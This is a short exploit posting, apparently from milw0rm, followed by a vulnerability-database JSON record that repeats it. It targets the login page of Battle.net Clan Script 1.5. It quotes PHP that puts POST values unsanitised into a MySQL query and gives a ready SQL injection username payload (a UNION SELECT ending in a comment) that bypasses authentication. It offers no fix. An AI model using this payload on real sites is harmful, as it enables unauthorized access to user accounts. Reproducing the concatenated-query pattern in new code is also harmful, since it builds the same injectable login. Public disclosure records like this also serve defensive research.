****************************************
script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql
auteur : h a c k e r _ X
***************************************
code :
------------------------------------------------------------------------------------------
line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];
.....
.....
.....
line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******
-------------------------------------------------------------------------------------------------
exploit :
*******
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything
************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers
special thinks for "P Y N S S O"
************************************************** *
# milw0rm.com [2007-04-09]
{"id": "SECURITYVULNS:DOC:16674", "bulletinFamily": "software", "title": "Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability", "description": "****************************************\r\n\r\nscript : Battle.net Clan Script 1.5\r\nfile : login.php\r\nattack : injection sql\r\n\r\nauteur : h a c k e r _ X\r\n\r\n***************************************\r\n\r\ncode :\r\n------------------------------------------------------------------------------------------\r\n\r\nline 9 --> $user = $_POST['user'];\r\nline 10--> $pass = $_POST['pass'];\r\n\r\n.....\r\n.....\r\n.....\r\n\r\nline 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);\r\n*******\r\n\r\n-------------------------------------------------------------------------------------------------\r\n\r\n\r\nexploit :\r\n*******\r\n\r\nUsername : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*\r\npassword : enything\r\n\r\n\r\n\r\n\r\n\r\n************************************************** *\r\nthinks to : max007,simo64,brutalism and all marocains hackers\r\n\r\nspecial thinks for "P Y N S S O"\r\n\r\n************************************************** *\r\n\r\n# milw0rm.com [2007-04-09]", "published": "2007-04-11T00:00:00", "modified": "2007-04-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16674", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 99, "enchantments": {"score": {"value": 1.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7570"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645615152, "score": 1659803227}, "_internal": {"score_hash": "e4a836d7e2fa414c38c42923c8ab8cec"}}